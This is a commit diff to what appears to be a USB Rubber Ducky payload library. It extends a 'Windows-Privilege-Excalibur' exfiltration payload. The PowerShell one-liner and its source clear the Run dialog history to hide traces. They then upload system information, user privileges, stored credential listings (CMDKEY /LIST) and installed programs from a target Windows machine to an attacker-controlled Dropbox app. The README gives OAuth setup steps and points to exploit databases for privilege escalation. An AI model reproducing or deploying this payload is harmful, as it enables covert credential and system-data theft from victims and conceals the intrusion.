Add files via upload

payloads/library/exfiltration/Windows-Privilege-Excalibur/DROPBOXSETUP.md

@@ -0,0 +1,19 @@
+- **Configure your Dropbox application**
+
+    - Create a Dropbox account.
+    - [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
+    - Go to the settings of this app and write down your "App key" and "App secret".  
+    *These are your "<APP_KEY>" and "<APP_SECRET>".*
+    - Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
+    - After that, open this link in your browser *(values between brackets must be changed)*.
+    ```
+    https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
+    ```
+    - Connect your application, allow its permissions, and note the code it gives you.  
+    *This is your "<APP_CODE>".*
+    - Open a command prompt and run this command *(values between brackets must be changed)*.
+    ```
+    curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
+    ```
+    - Note the "refresh_token" value of the result.  
+    *This is your "<REFRESH_TOKEN>".*

payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md

@@ -6,31 +6,17 @@
 
 ## Description
 
-This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
+This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
 
-## Usage
+*The setup needs to be done only once for the payload to work forever.*
 
-### Setup
+## Setup
 
-- **Configure your Dropbox application**
+> If you already have your <APP_KEY>, <APP_SECRET> and <REFRESH_TOKEN>, you can go directly to the "Prepare your payload" step.
 
-    - Create a Dropbox account.
-    - [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
-    - Go to the settings of this app and write down your "App key" and "App secret".  
-    *These are your "<APP_KEY>" and "<APP_SECRET>".*
-    - Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
-    - After that, open this link in your browser *(values between brackets must be changed)*.
-    ```
-    https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
-    ```
-    - Connect your application, allow its permissions, and note the code it gives you.  
-    *This is your "<APP_CODE>".*
-    - Open a command prompt and run this command *(values between brackets must be changed)*.
-    ```
-    curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
-    ```
-    - Note the "refresh_token" value of the result.  
-    *This is your "<REFRESH_TOKEN>".*
+- **Configure your Dropbox application** 
+ 
+    - Follow the instructions in "[DROPBOXSETUP.md](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/DROPBOXSETUP.md)".
 
 - **Prepare your payload**
 
@@ -42,15 +28,20 @@ This payload exfiltrates Windows system information, user information (such as p
     - Download the "payload.txt" file.
     - Edit it to include your <DOWNLOAD_LINK>.
 
-### Analysis
+## Analysis
 
-Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
+Once you have your report file, you can use the following resources to help you find ways to escalate your privileges:
 
-You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
+| Report Categories | Useful Resources |
+| --- | --- |
+| System Information | [WES-NG](https://github.com/bitsadmin/wesng)  |
+| User Information | [Priv2Admin](https://github.com/gtworek/Priv2Admin) |
+| Stored Credentials | |
+| Installed Programs | [Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com) |
 
-You can check if the user has dangerous permissions that can be exploited.
+#### Coming soon...
 
-The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
+- [ ] Windows Services Misconfigurations
 
 ---
 

payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt

@@ -1,6 +1,6 @@
 REM     Title: Windows Privilege Excalibur
 REM     Author: Who-Is-Julien
-REM     Description: This payload exfiltrates Windows system information and installed programs from the target computer to DropBox cloud storage for subsequent privilege escalation analysis.
+REM     Description: This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis.
 REM     Target: Windows 10, 11
 
 REM     Replace DOWNLOAD_LINK with the actual download link of the script.

payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1

@@ -3,4 +3,4 @@
 #Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
 
 
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Stored Credentials #`n $(CMDKEY /LIST | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null

payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1

@@ -40,6 +40,8 @@ $body = "# System Information #`n $(SYSTEMINFO | Out-String)"
 
 $body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
 
+$body += "`n# Stored Credentials #`n $(CMDKEY /LIST | Out-String)"
+
 $body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
 
 #Upload the report to Dropbox using the headers and body defined above